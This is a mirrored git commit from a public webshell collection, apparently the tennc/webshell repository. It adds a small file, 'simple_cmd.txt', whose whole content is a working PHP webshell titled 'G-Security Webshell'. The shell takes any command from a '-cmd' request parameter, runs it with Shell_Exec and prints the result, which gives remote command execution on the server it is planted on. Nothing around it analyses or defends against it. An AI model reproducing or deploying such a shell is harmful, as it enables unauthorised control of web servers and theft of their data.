mirror of
https://github.com/tennc/webshell.git
synced 2026-01-06 14:49:09 +00:00
138shell update
This commit is contained in:
18
138shell/S/simple_cmd.txt
Normal file
18
138shell/S/simple_cmd.txt
Normal file
@@ -0,0 +1,18 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>G-Security Webshell</title>
|
||||
</head>
|
||||
|
||||
<body bgcolor=#000000 text=#ffffff ">
|
||||
<form method=POST>
|
||||
<br>
|
||||
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
|
||||
style="background:#000000;color:#ffffff;">
|
||||
<hr>
|
||||
<pre>
|
||||
<? $cmd = $_REQUEST["-cmd"];?>
|
||||
<? if($cmd != "") print Shell_Exec($cmd);?>
|
||||
</pre>
|
||||
</form>
|
||||
</body>
|
||||
</html
|
||||
Reference in New Issue
Block a user